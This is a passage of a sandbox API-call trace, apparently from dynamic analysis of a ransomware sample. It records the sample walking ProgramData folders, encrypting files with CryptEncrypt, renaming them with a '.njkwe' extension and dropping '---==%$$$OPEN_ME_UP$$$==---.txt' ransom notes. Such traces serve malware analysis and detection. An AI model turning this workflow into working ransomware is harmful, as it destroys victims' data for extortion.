0xbe0000 [0073.631] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0073.632] ReadFile (in: hFile=0x430, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f55c*=0x2800, lpOverlapped=0x0) returned 1 [0073.633] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.633] WriteFile (in: hFile=0x430, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f55c*=0x2800, lpOverlapped=0x0) returned 1 [0073.634] GetProcessHeap () returned 0xbe0000 [0073.634] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0073.634] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.634] WriteFile (in: hFile=0x430, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f55c*=0x300, lpOverlapped=0x0) returned 1 [0073.634] WriteFile (in: hFile=0x430, lpBuffer=0x380f4a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0x380f4a8*, lpNumberOfBytesWritten=0x380f55c*=0x80, lpOverlapped=0x0) returned 1 [0073.634] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f55c*=0x4, lpOverlapped=0x0) returned 1 [0073.635] CloseHandle (hObject=0x430) returned 1 [0073.635] GetProcessHeap () returned 0xbe0000 [0073.635] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0073.635] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL_r00t_{3sXlE5}.njkwe") returned 62 [0073.635] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl_r00t_{3sxle5}.njkwe")) returned 1 [0073.635] GetProcessHeap () returned 0xbe0000 [0073.635] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0073.636] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a8b18c4, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5ed1465, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5ed1465, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Pending.GRL", cAlternateFileName="")) returned 1 [0073.636] lstrcmpiW (lpString1="Pending.GRL", lpString2="Windows") returned -1 [0073.636] lstrcmpiW (lpString1="Pending.GRL", lpString2="$Recycle.bin") returned 1 [0073.636] lstrcmpiW (lpString1="Pending.GRL", lpString2="System Volume Information") returned -1 [0073.636] lstrcmpiW (lpString1="Pending.GRL", lpString2="Program Files") returned -1 [0073.636] lstrcmpiW (lpString1="Pending.GRL", lpString2="Program Files (x86)") returned -1 [0073.636] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL") returned 43 [0073.636] StrStrIW (lpFirst="Pending.GRL", lpSrch=".njkwe") returned 0x0 [0073.636] lstrcmpW (lpString1="Pending.GRL", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.636] lstrcmpW (lpString1="Pending.GRL", lpString2="taridd") returned -1 [0073.636] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.636] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0073.637] GetTickCount () returned 0x1152c3c [0073.637] GetTickCount () returned 0x1152c3c [0073.637] GetTickCount () returned 0x1152c3c [0073.637] GetTickCount () returned 0x1152c3c [0073.637] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f4a8*, pdwDataLen=0x380f558*=0x2c, dwBufLen=0x80 | out: pbData=0x380f4a8*, pdwDataLen=0x380f558*=0x80) returned 1 [0073.637] GetProcessHeap () returned 0xbe0000 [0073.637] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0073.637] ReadFile (in: hFile=0x430, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f55c*=0x2800, lpOverlapped=0x0) returned 1 [0073.639] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.639] WriteFile (in: hFile=0x430, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f55c*=0x2800, lpOverlapped=0x0) returned 1 [0073.641] GetProcessHeap () returned 0xbe0000 [0073.641] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0073.641] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.641] WriteFile (in: hFile=0x430, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f55c*=0x300, lpOverlapped=0x0) returned 1 [0073.642] WriteFile (in: hFile=0x430, lpBuffer=0x380f4a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0x380f4a8*, lpNumberOfBytesWritten=0x380f55c*=0x80, lpOverlapped=0x0) returned 1 [0073.642] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f55c*=0x4, lpOverlapped=0x0) returned 1 [0073.642] CloseHandle (hObject=0x430) returned 1 [0073.642] GetProcessHeap () returned 0xbe0000 [0073.642] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0073.642] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL_r00t_{3sXlE5}.njkwe") returned 63 [0073.642] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl_r00t_{3sxle5}.njkwe")) returned 1 [0073.642] GetProcessHeap () returned 0xbe0000 [0073.642] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0073.642] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a8b18c4, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5ed1465, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5ed1465, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Pending.GRL", cAlternateFileName="")) returned 0 [0073.643] FindClose (in: hFindFile=0xc19ce0 | out: hFindFile=0xc19ce0) returned 1 [0073.643] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 63 [0073.643] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\mf\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0073.643] WriteFile (in: hFile=0x42c, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f564, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f564*=0x351, lpOverlapped=0x0) returned 1 [0073.644] CloseHandle (hObject=0x42c) returned 1 [0073.648] GetProcessHeap () returned 0xbe0000 [0073.648] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0073.648] FindNextFileW (in: hFindFile=0xc19fa0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd80e29d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="NetFramework", cAlternateFileName="NETFRA~1")) returned 1 [0073.648] lstrcmpiW (lpString1="NetFramework", lpString2="Windows") returned -1 [0073.648] lstrcmpiW (lpString1="NetFramework", lpString2="$Recycle.bin") returned 1 [0073.648] lstrcmpiW (lpString1="NetFramework", lpString2="System Volume Information") returned -1 [0073.648] lstrcmpiW (lpString1="NetFramework", lpString2="Program Files") returned -1 [0073.648] lstrcmpiW (lpString1="NetFramework", lpString2="Program Files (x86)") returned -1 [0073.648] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework") returned 41 [0073.648] lstrcmpW (lpString1="NetFramework", lpString2=".") returned 1 [0073.648] lstrcmpW (lpString1="NetFramework", lpString2="..") returned 1 [0073.648] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.648] GetProcessHeap () returned 0xbe0000 [0073.648] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0073.648] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*") returned 43 [0073.648] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*", lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd80e29d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a120 [0073.648] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.648] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.648] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.648] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.649] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.649] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\.") returned 43 [0073.649] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.649] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd80e29d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.649] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.649] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.649] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.649] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.649] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.649] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\..") returned 44 [0073.649] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.649] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.649] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd80f277, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="BreadcrumbStore", cAlternateFileName="BREADC~1")) returned 1 [0073.649] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="Windows") returned -1 [0073.649] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="$Recycle.bin") returned 1 [0073.649] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="System Volume Information") returned -1 [0073.649] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="Program Files") returned -1 [0073.649] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="Program Files (x86)") returned -1 [0073.649] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore") returned 57 [0073.649] lstrcmpW (lpString1="BreadcrumbStore", lpString2=".") returned 1 [0073.649] lstrcmpW (lpString1="BreadcrumbStore", lpString2="..") returned 1 [0073.649] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.649] GetProcessHeap () returned 0xbe0000 [0073.649] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0073.649] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*") returned 59 [0073.649] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd80f277, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a2a0 [0073.649] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.649] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.649] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.649] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.650] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.650] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\.") returned 59 [0073.650] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.650] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd80f277, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.650] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.650] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.650] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.650] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.650] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.650] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\..") returned 60 [0073.650] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.650] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.650] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd80f277, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0073.650] FindClose (in: hFindFile=0xc1a2a0 | out: hFindFile=0xc1a2a0) returned 1 [0073.650] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 89 [0073.650] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\netframework\\breadcrumbstore\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0073.651] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0073.652] CloseHandle (hObject=0x430) returned 1 [0073.652] GetProcessHeap () returned 0xbe0000 [0073.652] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0073.652] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd80f277, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="BreadcrumbStore", cAlternateFileName="BREADC~1")) returned 0 [0073.652] FindClose (in: hFindFile=0xc1a120 | out: hFindFile=0xc1a120) returned 1 [0073.652] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 73 [0073.652] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\netframework\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0073.653] WriteFile (in: hFile=0x42c, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f564, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f564*=0x351, lpOverlapped=0x0) returned 1 [0073.654] CloseHandle (hObject=0x42c) returned 1 [0073.654] GetProcessHeap () returned 0xbe0000 [0073.654] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0073.654] FindNextFileW (in: hFindFile=0xc19fa0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17cbb4ff, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd80ffe4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17cbb4ff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Network", cAlternateFileName="")) returned 1 [0073.654] lstrcmpiW (lpString1="Network", lpString2="Windows") returned -1 [0073.654] lstrcmpiW (lpString1="Network", lpString2="$Recycle.bin") returned 1 [0073.654] lstrcmpiW (lpString1="Network", lpString2="System Volume Information") returned -1 [0073.654] lstrcmpiW (lpString1="Network", lpString2="Program Files") returned -1 [0073.654] lstrcmpiW (lpString1="Network", lpString2="Program Files (x86)") returned -1 [0073.654] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network") returned 36 [0073.654] lstrcmpW (lpString1="Network", lpString2=".") returned 1 [0073.654] lstrcmpW (lpString1="Network", lpString2="..") returned 1 [0073.654] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.654] GetProcessHeap () returned 0xbe0000 [0073.654] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0073.654] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*") returned 38 [0073.654] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*", lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17cbb4ff, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd80ffe4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17cbb4ff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19da0 [0073.655] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.655] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.655] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.655] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.655] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.655] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\.") returned 38 [0073.655] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.655] FindNextFileW (in: hFindFile=0xc19da0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17cbb4ff, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd80ffe4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17cbb4ff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.655] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.821] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.821] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.821] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.821] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.821] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\..") returned 39 [0073.821] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.821] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.821] FindNextFileW (in: hFindFile=0xc19da0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17cbb4ff, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xcf245536, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xcf245536, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0073.821] lstrcmpiW (lpString1="Connections", lpString2="Windows") returned -1 [0073.821] lstrcmpiW (lpString1="Connections", lpString2="$Recycle.bin") returned 1 [0073.821] lstrcmpiW (lpString1="Connections", lpString2="System Volume Information") returned -1 [0073.821] lstrcmpiW (lpString1="Connections", lpString2="Program Files") returned -1 [0073.821] lstrcmpiW (lpString1="Connections", lpString2="Program Files (x86)") returned -1 [0073.821] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: 